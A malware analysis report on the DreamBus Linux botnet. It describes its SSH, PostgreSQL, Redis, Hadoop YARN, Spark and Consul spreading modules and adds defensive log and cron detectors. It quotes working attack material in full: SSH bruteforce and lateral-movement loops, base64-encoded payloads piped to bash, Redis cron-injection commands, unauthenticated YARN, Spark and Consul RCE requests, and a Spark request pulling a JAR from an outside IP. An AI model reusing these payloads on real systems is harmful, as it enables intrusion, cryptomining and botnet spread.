While this slight modification breaks the UPX command line tool, the ELF binary is still valid. Therefore, it can be unpacked and executed. This simple change may be sufficient to bypass some security software. Antivirus software often has low detection rates for DreamBus and its various modules. DreamBus is designed to be portable across a range of Unix and Linux-based operating systems. To be as portable as possible, the malware downloads various dependencies and components if they are not present on the compromised system.

Botnet architecture DreamBus has a modular design with regular deployment of new modules and updates. Most command-and-control (C&C) components are hosted through TOR or on an anonymous file-sharing service such as oshi[.]at and leverage the HTTP protocol. The malware name is derived from the prefix of the TOR domain dreambusweduybcp[.]onion that has been used for C&C communications since July 2019. Figure 2 shows a high-level diagram of the DreamBus botnet architecture and its various modules. At the time of publication, Zscaler ThreatLabZ has observed modules designed to spread through SSH, PostgreSQL, Redis, Hadoop YARN, Apache Spark, HashiCorp Consul, and SaltStack. Many DreamBus plugins share code, for example, to create a lock file named 22 in the directory /tmp/.X11-unix/, and most set the name of the calling thread to tracepath.
This is intended to disguise the DreamBus modules and make them appear to be legitimate (since many modules are downloaded with pseudo-randomly generated filenames). Figure 2. High-level diagram of the DreamBus botnet architecture Since not all compromised systems have TOR installed, DreamBus will use a proxy service such as tor2web to translate requests between TOR and the internet (described in more detail later in this analysis).

DreamBus scanning behavior The success of DreamBus is dependent on spreading to as many systems as possible. Therefore, it scans systems that are on a local intranet as well as the internet. Most DreamBus modules scan the internal RFC 1918 ranges,, and for vulnerable applications that it targets. Figure 3 illustrates this scanning process. Figure 3. DreamBus scanning behavior for public and private networks Most DreamBus modules (with a few exceptions) scan the following internet ranges:
[1-3].0.0.0/8
[12-15].0.0.0/8
[23-24].0.0.0/8
[34-47].0.0.0/8
[49-52].0.0.0/8
[57-98].0.0.0/8
[100-126].0.0.0/8
[128-213].0.0.0/8
[216-223].0.0.0/8

DreamBus main spreader module The main component of DreamBus has the ability to spread itself through SSH. This module is also downloaded over HTTP whenever an exploitation attempt is successful, typically through a number of hardcoded TOR domains. The HTTP request path to download the main DreamBus spreader module (after exploitation) is made in the format of the exploit that was successful, as shown in Table 1.

Request Path Name            Successful Exploit
/int.<arch>                  Main Spreader Module
/sh.<arch>                   SSH Bruteforce
/pg.<arch> or /pgl.<arch>    PostgreSQL
/rd.<arch> or /rdl.<arch>    Redis
/hdl.<arch>                  Hadoop YARN
/sp.<arch>                   Apache Spark
/csl.<arch>                  HashiCorp Consul
/st.<arch>                   SaltStack
Table 1. DreamBus pathnames to report a successful exploitation attempt and download the main spreader module

The DreamBus spreader module contains seven shell scripts that are responsible for performing various actions.
The first script is designed to set up a temporary directory under /tmp/.X11-unix/ that the malware uses for lock files. The DreamBus spreader module creates the lock file 01 in this directory. The malware then executes a number of shell commands to set up the environment and remove competing malware, other cryptocurrency miners, and cloud software. The shell scripts also define a set of variables and functions. DreamBus and its modules predominantly use cURL for network communications and set the HTTP user agent string to a hyphen (-) character. The shell scripts also define TOR domains that are used for C&C communications. Identical code is found in many of the second-stage DreamBus modules. The DreamBus function sockz() uses DNS over HTTP to resolve IP addresses for the domain name by querying the following domains: The function x() is used to establish persistence by creating a cron job that runs once per hour, with the starting minute chosen randomly between 0 and 58. The cron job will be created in one of the following locations: $HOME/ /opt/ /etc/cron.d/0systemd-service The cron job will execute a shell script that downloads an updated copy of the DreamBus malware over TOR. The function fexe() creates a file named i containing the line exit in the infected user’s home directory and in the /tmp, /var/tmp and /usr/bin directories. It then attempts to execute the file and delete it. This is designed to find a directory in which the malware can write and execute files. Another DreamBus function named isys() decodes and executes a Base64 encoded string that downloads the cURL utility, if it is not present, through the /dev/tcp device or with wget. DreamBus will also download the socket statistics utility ss if it is not available. The function then attempts to use the yum and apt package managers to install and enable the cron service, and to uninstall aegis and qcloud. The function issh() is designed to spread DreamBus through SSH.
It attempts to use IT automation tools such as ansible, knife, salt, and pssh (parallel ssh) with a Base64 encoded string that contains shell commands to infect remote systems; these commands are discussed in more detail in the following paragraphs. This function also extracts hosts from the user's bash_history, the /etc/hosts file, and the known_hosts file with grep, using a regular expression and filtering out entries that start with the prefix 127 (to remove localhost), as shown below:

```sh
hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |grep -v ^127.|awk -F: {'print $2'}|sort|uniq)
```

For each host, the module tries to authenticate as root using trusted SSH public key authentication:

```sh
for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l root $h
```

It then tries to authenticate to each remote server with the username of the compromised account, again using SSH public key authentication:

```sh
for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l $USER $h
```

If either the IT automation tools or the SSH public key authentication attempts are successful, the main DreamBus spreader module executes a series of commands on the remote system to retrieve the username, computer name, architecture, and external IP address, compute an MD5 hash of the system's network IP addresses, and list that user's cron jobs. The newly compromised system concatenates these values, separated by underscores, and sends an HTTP request over TOR with the result in the referrer field. Table 2 shows how each field is obtained on an infected system.

| Field | Command |
| --- | --- |
| External IP | Result of a request to an external IP lookup service |
| User | whoami |
| Hardware | uname -m |
| Hostname | uname -n |
| MD5 Hash of IPs | ip a \| grep 'inet '\| awk {'print $2'} \| md5sum \| awk {'print $1'} |
| Cron | crontab -l \| base64 -w0 |

Table 2. System information collected by DreamBus to track infections
The TOR connection is established through a SOCKS5 proxy connection to one of the IPs resolved by the sockz() function in order to reach a hardcoded TOR domain. If this fails, it falls back to an HTTP TOR proxy, using one of several tor2web-style services with the hardcoded TOR domain prepended to the service's hostname. The main DreamBus spreader module uses one of these TOR proxies to send an HTTP request to the path /int.<arch>, where the architecture is taken from the output of the command uname -m. The response to this request is typically either the DreamBus spreader module or a series of shell commands to execute, depending on the system architecture. DreamBus provides support for the following hardware architectures, which include both 32-bit and 64-bit versions:

armv7l
armv6l
mips
mips64el
aarch64
i686
x86_64

The main spreader module also has a function named ibot() that reports the infection back to the C&C server. This allows the threat actor to track infections and identify the exploits that are most effective. The request uses cURL (or wget as a fallback) to send an HTTP request to a hardcoded TOR domain with the path /bot. The same system information is passed in the HTTP referrer, in the format shown in Table 2.

The function called iscn() terminates processes named tracepath and sends an HTTP request with the path /trc to a hardcoded TOR domain. The output is saved to a file whose name is the MD5 hash of the output of the command line date utility. This file is then executed and deleted.

In another shell script, DreamBus defines a function called u() that sends an HTTP request to the path /cmd on a hardcoded TOR domain and executes the result without saving it to disk. The same function name is also used to download an XMRig Monero miner from the path /cpu and the main spreader module from /int.<arch> described above.
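The beacon traffic described above (the /bot, /cmd, /trc and /cpu requests with a hyphen user agent, and the Table 2 tuple in the referrer) is easy to hunt for in web or proxy logs. The following detector is an added example, not code from the report: it assumes Apache/nginx "combined" log lines, and the sample lines, IPs and hash are constructed.

```python
"""Flag DreamBus beacon and download requests in combined-format web/proxy logs."""
import re

# Status and command endpoints used by ibot(), iscn() and u() (described above).
COMMAND_PATHS = {"/bot", "/cmd", "/trc", "/cpu"}
# Supported architectures listed above; mips64el must precede mips in the alternation.
ARCH = r"(armv7l|armv6l|mips64el|mips|aarch64|i686|x86_64)"
# Per-exploit download paths from Table 1, e.g. /int.x86_64 or /pgl.aarch64.
DOWNLOAD_PATH = re.compile(r"^/(int|sh|pg|pgl|rd|rdl|hdl|sp|csl|st)\." + ARCH + r"$")
# Table 2 fields joined by underscores: ip_user_hardware_hostname_md5_cronbase64.
# The username may itself contain underscores, so it is matched lazily and the
# architecture is pinned to the known list (x86_64 contains an underscore too).
REFERER = re.compile(
    r"^(?P<external_ip>[^_]+)_(?P<user>.+?)_(?P<hardware>" + ARCH + r")_"
    r"(?P<hostname>[^_]+)_(?P<ip_md5>[0-9a-f]{32})_(?P<cron_b64>[A-Za-z0-9+/=]*)$"
)
# Apache/nginx "combined" log format (assumed here): client ident user [time]
# "method path proto" status size "referer" "user-agent".
COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def inspect_line(line):
    """Return a finding for a DreamBus-looking request, or None for anything else."""
    m = COMBINED.match(line)
    if not m:
        return None
    path, ua, referer = m.group("path"), m.group("ua"), m.group("referer")
    is_command = path in COMMAND_PATHS
    is_download = DOWNLOAD_PATH.match(path) is not None
    if not (is_command or is_download):
        return None
    fields = REFERER.match(referer)
    # A logged UA of "-" is ambiguous on its own (it also means "no UA header"),
    # so it only raises confidence together with a matching path. A referer that
    # parses as the Table 2 tuple is the strongest signal.
    confidence = "high" if (ua == "-" or fields) else "low"
    return {
        "client": m.group("client"),
        "path": path,
        "kind": "command" if is_command else "download",
        "ua_is_hyphen": ua == "-",
        "referer_fields": fields.groupdict() if fields else None,
        "confidence": confidence,
    }


def scan_log(lines):
    """Run inspect_line over an iterable of log lines and keep only the findings."""
    return [f for f in (inspect_line(line) for line in lines) if f]


# Constructed sample lines (not real telemetry); the IPs, hostname and MD5 are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jan/2021:06:12:01 +0000] "GET /bot HTTP/1.1" 200 12 '
    '"203.0.113.7_root_x86_64_db01_9e107d9d372bb6826bd81d3542a419d6_" "-"',
    '10.0.0.5 - - [22/Jan/2021:06:12:02 +0000] "GET /int.x86_64 HTTP/1.1" 200 60000 "-" "-"',
    '10.0.0.9 - - [22/Jan/2021:06:13:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [22/Jan/2021:06:13:05 +0000] "GET /cmd HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

In real traffic the request goes to a tor2web-style proxy, so the Host header rather than the path carries the onion name; the path and referrer checks above do not depend on it.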
The responses from the /trc and /cmd paths typically provide instructions to download second-stage modules that are used to propagate the malware further. These modules are described in the following sections.

DreamBus SSH bruteforce module

The SSH bruteforce module is delivered as a shell script that contains commands to download and extract a tar archive named sshd into the directory /tmp/.X11-unix/sshd. Once extracted, there are three components, as shown in Table 3.

| Filename | Description |
| --- | --- |
| ss | The tool pnscan, used by DreamBus to scan for SSH servers on the local network |
| ssh | The tool sshpass, used for bruteforcing SSH passwords |
| pw | List of passwords to use for the SSH bruteforce |

Table 3. Files extracted from the DreamBus SSH bruteforce module

The first file, named ss (not to be confused with the socket statistics utility), is the open source tool Parallel Network Scanner (a.k.a. pnscan) compiled as an ELF binary. The second file, named ssh, is another ELF binary based on the open source tool sshpass, which is designed to automate SSH authentication and shell script execution. The source code has been modified in several places, including the supported command-line arguments, which are now:

```
Usage: sshpass address port username dict_file [threads=100]
```

All second-stage DreamBus plugins, including the SSH bruteforce module, create a lock file named 22 in the lock file directory /tmp/.X11-unix/. The binary also embeds a Base64 encoded shell script that is executed on the remote host upon a successful SSH login. These shell commands download and execute the main DreamBus spreader module via the path /sh.<arch>. The pw file contains a list of approximately 2,711 passwords that are used for the SSH bruteforce attack and passed to the sshpass utility. The script attempts to move laterally within a private internal network by first enumerating the system's network adapters and searching for regexes that loosely match RFC 1918 IP address ranges.
The code writes a shell command to a file named r that invokes the sshpass application with a placeholder for an IP address to launch an SSH bruteforce attack against various usernames (e.g., hadoop, jenkins, kafka, postgres, redis, root, ubuntu, vagrant, varnish, and yarn), using the file pw as the password dictionary. The pnscan tool ss is then used to scan the internal subnets for online SSH servers, and the results are saved to a file named ip. This file is then read by the script r to launch the SSH bruteforce attack. The code for this process is shown below:

```sh
echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do timeout 12m ./ssh $i 22 root ./pw >/dev/null 2>&1;done' > r
chmod +x *;ulimit -n 60000;>ip;touch -r ss r ip
n1=$(ip a|awk {'print $2'}|grep ^10[.] |sort -R|head -1|cut -d. -f1,2)
n2=$(ip a|awk {'print $2'}|grep ^172[.][1-3]|sort -R|head -1|cut -d. -f1,2)
n3=$(ip a|awk {'print $2'}|grep ^192.168|sort -R|head -1|cut -d. -f1,2)
[ ! -z "$n1" ] && (./ss -r"OpenSSH" $n1.0.0/16 22 >ip;./r)
[ ! -z "$n2" ] && (./ss -r"OpenSSH" $n2.0.0/16 22 >ip;./r)
[ ! -z "$n3" ] && (./ss -r"OpenSSH" $n3.0.0/16 22 >ip;./r)
```

DreamBus PostgreSQL module

PostgreSQL (or Postgres) is a popular open source SQL database application that is targeted by DreamBus. Zscaler ThreatLabZ has observed numerous versions of the DreamBus PostgreSQL module with several differences between them, such as code that sets the calling thread name, and the internet ranges and port numbers that are scanned. Most PostgreSQL modules use the standard tracepath naming convention mentioned earlier. However, some PostgreSQL modules set the calling thread name to postgres: logical replication launcher or postgres: autovacum. All versions of the DreamBus PostgreSQL modules spread by scanning the RFC 1918 private networks for PostgreSQL servers running on port 5432. However, the internet ranges that are scanned vary depending on the module version.
Most of the modules scan the ranges listed in the DreamBus Scanning Behavior section of this report. However, at least one variant of the DreamBus PostgreSQL module scans additional internet ranges on ports 5432 and 5433.

In order to identify a PostgreSQL server, the DreamBus module sends the bytes 00 00 00 08 04 D2 16 00. These bytes are the request that starts an SSL handshake with a PostgreSQL server; the last byte of the packet, however, has been set to null (0x00) so that it triggers an error message from a PostgreSQL server. More specifically, the DreamBus PostgreSQL module checks for the response unsupported frontend protocol. If this message is returned by the server, the module attempts to exploit the system through a bruteforce password attack. The DreamBus PostgreSQL modules vary in the username and password lists that they use. To date, Zscaler ThreatLabZ has observed the following usernames (in aggregate) across these modules:

postgres
redmine
root
admin
rdsdb
clouder-scm
dbadmin
stolon
odoo

The PostgreSQL modules include a hardcoded dictionary of passwords, with samples containing approximately 2,627 entries. If the DreamBus module is able to authenticate using any of these passwords, the malware executes an SQL query similar to the following:

```sql
DROP TABLE IF EXISTS x0x0;CREATE TABLE x0x0(cmd_output text);COPY x0x0 FROM PROGRAM 'echo WFJBT...[snip]...1zIDkga2RldnRtcGZzaQpwcyB4IHxncmVwIGtpbnNpbmd8eGFyZ3Mga2lsbCAtOSAKcHMgeCB8Z3JlcCBrZGV2dG1wZnNpfHhhcmdzIGtpbGwgLTkgCmNyb250YWIgLWx8Z3JlcCAtdiBjdXJsfGNyb250YWIgLQpjcm9udGFiIC1sfGdyZXAgLXYgd2dldHxjcm9udGFiIC0K|base64 -d|bash';SELECT * FROM x0x0;DROP TABLE IF EXISTS x0x0;
```

The database table name frequently changes (e.g., x0x0, abroxu, and putin) across the various PostgreSQL modules. This command exploits the disputed vulnerability CVE-2019-9193, which allows users with pg_execute_server_program privileges to execute arbitrary code. However, this behavior is considered to be a "feature" by PostgreSQL developers.
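The probe above is a standard PostgreSQL startup packet with an unknown protocol code, which is why the server answers with its "unsupported frontend protocol" error; the server logs that error together with the rejected major.minor pair, which makes the probe visible in PostgreSQL logs. The classifier below is an added example, not code from the report: it decodes startup packets, labels the DreamBus probe, derives the version string the server reports for it, and greps constructed server log lines (their exact format is assumed) for that string.

```python
"""Classify PostgreSQL startup packets and spot the DreamBus probe described above.

Added example, not code from the report. A PostgreSQL client opens every
connection with one packet: a big-endian uint32 total length followed by a
uint32 protocol code, read here as two uint16 halves (major.minor). The
special codes 1234.5678/5679/5680 are CancelRequest, SSLRequest and
GSSENCRequest; a real startup uses version 3.0. Any other value makes the
server answer with the "unsupported frontend protocol" error DreamBus keys on.
"""
import re
import struct

SPECIAL_CODES = {
    (1234, 5678): "CancelRequest",
    (1234, 5679): "SSLRequest",      # 00 00 00 08 04 D2 16 2F
    (1234, 5680): "GSSENCRequest",
}
# The probe bytes quoted above: an SSLRequest with its last byte zeroed.
DREAMBUS_PROBE = bytes.fromhex("0000000804d21600")
UNSUPPORTED_RE = re.compile(r"unsupported frontend protocol (\d+)\.(\d+)")


def parse_startup(data):
    """Return (length, major, minor) from the first 8 bytes, or None if too short."""
    if len(data) < 8:
        return None
    return struct.unpack(">IHH", data[:8])


def classify_startup_packet(data):
    """Label a client's first packet; 'dreambus-probe' is the malformed SSLRequest."""
    parsed = parse_startup(data)
    if parsed is None:
        return "truncated"
    length, major, minor = parsed
    if data[:8] == DREAMBUS_PROBE:
        return "dreambus-probe"
    if (major, minor) in SPECIAL_CODES:
        return SPECIAL_CODES[(major, minor)]
    if major == 3 and minor == 0 and length > 8:
        return "StartupMessage"
    return "unsupported-protocol %d.%d" % (major, minor)


def protocol_version_string(data):
    """The major.minor pair PostgreSQL prints when it rejects a startup packet."""
    parsed = parse_startup(data)
    return None if parsed is None else "%d.%d" % (parsed[1], parsed[2])


def probe_hits_in_postgres_log(lines):
    """Return (version, label) for each 'unsupported frontend protocol' log line.

    The label is 'dreambus-probe' when the rejected version is the one the probe
    above encodes (0x04D2.0x1600 = 1234.5632), and 'other' for any other client."""
    probe_version = protocol_version_string(DREAMBUS_PROBE)
    hits = []
    for line in lines:
        m = UNSUPPORTED_RE.search(line)
        if m:
            version = "%s.%s" % (m.group(1), m.group(2))
            hits.append((version, "dreambus-probe" if version == probe_version else "other"))
    return hits


# Constructed sample lines in the shape of a PostgreSQL server log; not real output.
SAMPLE_PG_LOG = [
    "2021-01-22 06:12:01 UTC [4242] FATAL:  unsupported frontend protocol 1234.5632: server supports 2.0 to 3.0",
    "2021-01-22 06:12:02 UTC [4243] LOG:  connection received: host=10.0.0.5 port=51234",
    "2021-01-22 06:12:03 UTC [4244] FATAL:  unsupported frontend protocol 9.9: server supports 2.0 to 3.0",
]

if __name__ == "__main__":
    print(classify_startup_packet(DREAMBUS_PROBE), protocol_version_string(DREAMBUS_PROBE))
    print(probe_hits_in_postgres_log(SAMPLE_PG_LOG))
```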
The SQL query causes a shell script to be Base64 decoded and executed. The content consists of a number of shell commands that first kill competing malware such as kinsing. The subsequent commands are similar to those of the main module: they attempt to download cURL if it is not available, resolve a TOR relay via DNS over HTTP, and connect to a hardcoded TOR domain to pull down the main DreamBus module on the newly infected system via an HTTP request path such as /pg.<arch> or /pgl.<arch>, depending on the module version.

DreamBus Redis module

Redis is a popular open source data store that is used as a database, cache, and message broker. DreamBus regularly deploys second-stage modules that are designed to target Redis. The modules are very similar, all with the goal of achieving remote code execution via a misconfigured Redis installation that either does not require a password or has a weak password. These misconfigurations are well known to be exploited. Shodan estimated that approximately 56,000 Redis servers were misconfigured with no authentication required, and Imperva estimated that nearly 75 percent of open Redis instances had been compromised.

Depending on the DreamBus Redis module version, the malware scans RFC 1918 private subnets on ports 6379, 7000, and 7001 and the internet ranges mentioned before. There are two primary versions of the DreamBus Redis module, which either attempt to bruteforce weak passwords or exploit an instance with no password authentication.

The Redis module that is designed to bruteforce passwords first checks whether the Redis server requires authentication by sending the command info and searching for the string NOAUTH Authentication required. If this string is returned by the server, the Redis module then sends an AUTH command with a password chosen from a hardcoded dictionary, which has approximately 28,930 entries. It then checks for the response OK
from the Redis server to determine whether authentication was successful. If the password is guessed, the Redis module sends the following commands:

```
auth %s
config set stop-writes-on-bgsave-error no
flushall
config set dir /etc/cron.d/
config set dbfilename systemdd
set r1 "\n\n* * * * * root curl -fsS|sh\n\n"
set r2 "\n\n* * * * * root wget -qO-|sh\n\n"
save
config set stop-writes-on-bgsave-error yes
config set dir /tmp
config set dbfilename .dump.rdb
flushall
```

Another version of the Redis module exploits systems that do not require authentication. This module first sends the Redis server an info command and searches for the string os:Linux. If this string is found, the Redis module sends the following commands:

```
config set stop-writes-on-bgsave-error no
flushall
config set dir /etc/cron.d/
config set dbfilename systemdd
set r1 "\n\n* * * * * root curl -fsS|sh\n\n"
set r2 "\n\n* * * * * root wget -qO-|sh\n\n"
save
config set stop-writes-on-bgsave-error yes
config set dir /tmp
config set dbfilename .dump.rdb
flushall
```

Both attacks set the current directory to /etc/cron.d/ and create a file named systemdd within this directory through the dbfilename variable. Note that this requires the Redis server to have write permissions in the /etc/cron.d/ directory. The subsequent two lines create cron jobs that are executed every minute to download and execute a shell command specified by the server, running as the root user. The save command writes the content to disk as a Redis database (RDB) file and, therefore, the file contains an RDB header. In order for this exploit to work properly, the compromised system requires a cron implementation that continues to parse the systemdd file after encountering the RDB header (which is not a valid cron format). Additionally, in modern versions of Redis the RDB files are compressed with LZF by default, so the implanted cron jobs may further be neutralized.
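Because the file is written by Redis's save command, it always begins with the RDB header, which a cron directory should never contain; that header is a simpler and more robust hunting signal than the cron lines themselves, which LZF compression can hide. The scanner below is an added example, not code from the report; the cron.d directory it inspects is constructed in a temporary folder, and the download URL in the sample is a placeholder for the one the report redacts.

```python
"""Hunt /etc/cron.d for files written by Redis, as the DreamBus Redis module does.

Added example, not code from the report. A file produced by Redis SAVE starts
with the RDB magic "REDIS" plus a four-digit version, so the injected
"* * * * * root curl ...|sh" lines never sit at the top of the file. With LZF
compression enabled (the default on modern Redis, as noted above) the strings
may not even be readable, so the header check is the reliable one.
"""
import os
import re
import tempfile

RDB_MAGIC = re.compile(rb"^REDIS\d{4}")
# Every-minute root job piping a downloader into a shell, matching the r1/r2 values above.
CRON_PIPE_TO_SHELL = re.compile(
    rb"\*\s+\*\s+\*\s+\*\s+\*\s+root\s+(curl|wget)\b[^\n]*\|\s*(ba)?sh\b"
)


def inspect_cron_file(path):
    """Return the reasons a cron file looks Redis-written or malicious (empty if clean)."""
    with open(path, "rb") as fh:
        data = fh.read()
    reasons = []
    if RDB_MAGIC.match(data):
        reasons.append("rdb-header")      # produced by Redis SAVE; never a valid cron file
    if CRON_PIPE_TO_SHELL.search(data):
        reasons.append("pipe-to-shell")
    if b"\x00" in data and "rdb-header" not in reasons:
        reasons.append("binary-content")  # cron files are text; NUL bytes are suspicious
    return reasons


def inspect_cron_dir(directory):
    """Map filename -> reasons for every suspicious regular file in a cron.d directory."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if os.path.isfile(full):
            reasons = inspect_cron_file(full)
            if reasons:
                findings[name] = reasons
    return findings


def demo():
    """Build a constructed cron.d with one benign job and one Redis-written 'systemdd'."""
    directory = tempfile.mkdtemp()
    with open(os.path.join(directory, "logrotate"), "wb") as fh:
        fh.write(b"0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
    # Rough shape of an uncompressed RDB dump holding keys r1 and r2: magic and
    # version, a few metadata bytes (arbitrary here), the two string values, EOF.
    # The download URL is a placeholder; the report redacts the real one.
    rdb = (b"REDIS0009\xfa\x09redis-ver\x055.0.7\xfe\x00\xfb\x02\x00"
           b"\x00\x02r1\x2e\n\n* * * * * root curl -fsS http://placeholder.invalid/0|sh\n\n"
           b"\x00\x02r2\x2f\n\n* * * * * root wget -qO- http://placeholder.invalid/0|sh\n\n\xff")
    with open(os.path.join(directory, "systemdd"), "wb") as fh:
        fh.write(rdb)
    return inspect_cron_dir(directory)


if __name__ == "__main__":
    print(demo())
```

On a live host, point inspect_cron_dir at /etc/cron.d (and the other cron directories); any "rdb-header" hit is worth treating as a compromise regardless of whether the cron lines are readable.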
After attempting to write the RDB file containing two cron tasks, the Redis module changes the dir and dbfilename variables to dummy values to hide its modifications. There are two differences between these Redis modules' commands. The auth command is only used by the authentication module, and the path on the web server to download and execute the second-stage shell script has the filename 0 (for the authentication module) versus 0l (for the module that spreads without authentication). The threat actor likely uses these two paths for statistical purposes, to differentiate which version of the Redis module spreads more effectively. If exploitation is successful, a shell script is downloaded and executed, which in turn downloads the DreamBus main spreader module via the path /rd.<arch> or /rdl.<arch>, depending on the module version.

DreamBus Hadoop YARN module

YARN is the resource management and job scheduling/monitoring component of the open source Apache Hadoop distributed processing framework. The DreamBus Hadoop module uses built-in YARN functionality to execute arbitrary commands via Hadoop's ResourceManager REST API when authentication has not been configured. The DreamBus Hadoop YARN module first checks whether the file /usr/bin/wget is executable. If this file does not exist, the module exits. Otherwise, the module scans RFC 1918 private subnets and the internet ranges previously mentioned on port 8088. The first request made by the DreamBus Hadoop YARN module is used to identify YARN servers through the HTTP request:

```
GET /stacks HTTP/1.1
Host:
```

The module checks for the presence of the string Process Thread Dump in the server's response. If a match is found, the DreamBus YARN module executes a series of shell commands.
The first sends an HTTP POST request to the target server using wget, as shown below:

```sh
exec &>/dev/null;app_id=$(wget -qO- --post-data '' %s:%d/ws/v1/cluster/apps/new-application|grep -o "application_[0-9]*_[0-9]*");
```

The response is parsed for the application ID, which is stored in the app_id variable and required in the next request. After obtaining the app_id value, the module executes the following shell command:

```sh
exec &>/dev/null;wget -qO- --post-data '{"am-container-spec": {"commands": {"command": "echo WFJBTkRPTQpleGVjIC...[snip]...AtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash"}},"application-id": "'$app_id'", "application-type": "YARN", "application-name": "'$app_id'"}' --header "Content-Type: application/json" %s:%d/ws/v1/cluster/apps &>/dev/null
```

This command sends an HTTP POST request to the YARN server with parameters that include the application ID and a Base64 encoded shell command, which is executed by the server without requiring any form of authentication. When the shell command is decoded and executed, it downloads the main DreamBus spreader module using the path /hdl.<arch>.

DreamBus Apache Spark module

Apache Spark is an open source distributed cloud computing framework for large-scale data processing. This DreamBus module exploits a remote code execution vulnerability in Apache Spark when it is run in Standalone Mode and the Master REST URL is accessible. The exploit is similar to several proof-of-concept examples. The DreamBus Apache Spark module scans the same RFC 1918 private subnets and internet ranges as the other modules. The Apache Spark module first sends the HTTP request shown below on port 6066 to the target server:

```
GET / HTTP/1.1
Host:
```

The DreamBus module checks for SparkVersion in the response to identify whether the server is an Apache Spark server.
If the response matches, the DreamBus module launches the exploit by sending the following HTTP POST request, which contains a link to a Java ARchive (JAR) file containing a class that will be executed by the Spark server:

```
POST /v1/submissions/create HTTP/1.1
Host: %s:%d
User-Agent: spark-api-cli
Content-Type: application/json
Content-Length: %d

{"action": "CreateSubmissionRequest","clientSparkVersion": "2.1.0","appArgs": [""],"appResource": "http://94.237.85[.]89:8080/xapp.jar","environmentVariables": {"SPARK_ENV_LOADED": "1"},"mainClass": "xapp","sparkProperties": {"spark.jars": "http://94.237.85[.]89:8080/xapp.jar","spark.driver.supervise": "false","": "xapp","spark.eventLog.enabled": "false","spark.submit.deployMode": "cluster","spark.master": "spark://%s:%d"} }
```

The payload is a JAR file named xapp.jar that contains a single class file named xapp.class. The code in this JAR invokes the shell /bin/sh and passes it Base64-encoded commands to execute, as shown below:

```java
public class xapp {
  public static void main(String[] paramArrayOfString) throws Exception {
    String[] arrayOfString = new String[3];
    arrayOfString[0] = "/bin/sh";
    arrayOfString[1] = "-c";
    arrayOfString[2] = "echo WFJBTkRPTQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vz...[snip]...gxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash";
    Runtime runtime = Runtime.getRuntime();
    Process process = runtime.exec(arrayOfString);
  }
}
```

When the shell command is decoded and executed, it downloads the main DreamBus spreader module using the path /sp.<arch>.

DreamBus HashiCorp Consul module

HashiCorp Consul is a multicloud service networking platform to connect and secure services. This DreamBus module exploits a vulnerability in the HashiCorp Consul service's API that enables remote code execution on Consul nodes.
The exploit requires the settings EnableScriptChecks, EnableLocalScriptChecks, or EnableRemoteScriptChecks to be enabled on the server. The DreamBus module searches for Consul servers running on port 8500. The module scans the same internal and external ranges as the other modules. The first step in the scanning process is to locate Consul servers through the HTTP request shown below:

```
GET /v1/agent/self HTTP/1.1
Host:
```

The DreamBus Consul module expects a response that contains only the letter a. It's not quite clear why the malware author chose to use this as a flag for detecting a HashiCorp Consul instance, since this is likely to result in many false positives. A similar exploit published by Metasploit checks for the EnableScriptChecks flags in the server response. If the expected response condition is met, the DreamBus module then attempts to remove a service named systemd-service by sending the following HTTP PUT request to the Consul API:

```
PUT /v1/agent/service/deregister/systemd-service HTTP/1.1
Host: %s:%d
User-Agent: consul-api-c
Content-Type: application/json
```

After attempting to remove the service, the DreamBus Consul module attempts to register a service with the same name, as shown below:

```
PUT /v1/agent/service/register HTTP/1.1
Host: %s:%d
User-Agent: consul-api-c
Content-Type: application/json
Content-Length: %d

{"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"Args": ["sh","-c","echo WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash"],"TTL": "120s"}}
```

This registration command registers a service named systemd-service that executes Base64-encoded shell commands.
These commands contain code similar to the other DreamBus modules: they attempt to download and install cURL if it doesn't exist on the system, and send a request to a hardcoded TOR domain with the path /csl.<arch>, which downloads and executes the main DreamBus module. The shell commands also loop through the compromised system's network adapters and attempt to deregister the systemd-service through the API and through the shell commands shown below:

```sh
ips=$(echo localhost; echo;hostname -i;ip a |grep "inet "|awk {'print $2'}|cut -d '/' -f 1;ifconfig |grep "inet "|awk {'print $2'})
for i in $ips ;do curl -m60 -X PUT http://$i:{8500}/v1/agent/service/deregister/systemd-service;done
for i in $ips ;do wget -t1 -T60 -qO- --method=PUT http://$i:{8500}/v1/agent/service/deregister/systemd-service;done
consul services deregister -id=systemd-service
```

The DreamBus Consul module then sends three further HTTP PUT requests to register the same service, but with a few slight variations of the command parameters, using the script parameter (instead of Args) as shown below:

```
PUT /v1/agent/service/register HTTP/1.1
Host: %s:%d
User-Agent: consul-api-c
Content-Type: application/json
Content-Length: %d

